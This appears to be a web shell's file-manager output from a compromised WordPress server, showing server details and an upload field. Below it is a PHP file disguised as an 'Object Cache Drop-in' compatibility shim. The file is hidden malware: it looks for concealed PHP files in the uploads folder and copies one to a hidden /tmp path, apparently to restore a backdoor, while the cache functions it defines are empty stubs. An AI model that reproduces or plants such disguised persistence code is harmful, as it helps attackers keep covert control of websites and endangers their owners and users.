| Server IP : 62.171.151.215 / Your IP : 216.73.217.53 Web Server : nginx/1.18.0 System : Linux vmi3128365 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : alex ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/guidelondres.fr/wp-content/ |
Upload File : |
<?php
/* Object Cache Drop-in — compatibility shim */
if (!defined('WP_CACHE_KEY_SALT')) define('WP_CACHE_KEY_SALT', '6eca7426f76e');
$_nx_p = '/tmp/phphcnhbm3gs30g4yG7zlp';
if (!file_exists($_nx_p)) {
foreach (glob('/var/www/guidelondres.fr/wp-content/uploads/class-wp-*_82663882.php') ?: array() as $_b) {
if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); break; }
}
}
if (!function_exists('wp_cache_init')) {
function wp_cache_init() { global $wp_object_cache; $wp_object_cache = new stdClass(); }
function wp_cache_add($k,$v,$g='default',$e=0){return true;}
function wp_cache_set($k,$v,$g='default',$e=0){return true;}
function wp_cache_get($k,$g='default',$f=false){return false;}
function wp_cache_delete($k,$g='default'){return true;}
function wp_cache_flush(){return true;}
function wp_cache_add_global_groups($g){}
function wp_cache_add_non_persistent_groups($g){}
function wp_cache_close(){return true;}
}